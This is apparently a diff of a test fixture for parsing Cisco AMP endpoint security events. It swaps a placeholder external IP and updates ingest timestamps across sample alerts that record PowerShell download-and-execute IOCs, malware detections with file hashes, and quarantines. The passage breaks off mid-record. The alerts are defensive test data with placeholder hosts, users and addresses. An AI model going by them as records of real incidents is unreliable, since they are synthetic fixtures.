"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-13T10:13:13.000Z", @@ -2721,7 +2721,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2776,7 +2776,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2786,8 +2786,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322492813Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", + "ingested": "2021-12-09T13:35:29.222579300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-13T10:13:08.000Z", @@ -2808,7 +2808,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2856,7 +2856,7 @@ "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2866,8 +2866,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322495198Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", + "ingested": "2021-12-09T13:35:29.222585300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2887,7 +2887,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2935,7 +2935,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2945,8 +2945,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322497481Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", + "ingested": "2021-12-09T13:35:29.222591200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-12T10:24:47.000Z", @@ -2967,7 +2967,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3007,7 +3007,7 @@ "Demo_AMP_Exploit_Prevention_Audit" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3017,8 +3017,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322499737Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222596900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -3035,7 +3035,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -3089,7 +3089,7 @@ "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3106,8 +3106,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322502030Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", + "ingested": "2021-12-09T13:35:29.222602600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3129,7 +3129,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3174,7 +3174,7 @@ "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3184,8 +3184,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322504227Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", + "ingested": "2021-12-09T13:35:29.222606800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3205,7 +3205,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3264,7 +3264,7 @@ "7d9518ea3f98d037745352b23861fab05d3777dc" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3281,8 +3281,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322506452Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", + "ingested": "2021-12-09T13:35:29.222611300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c4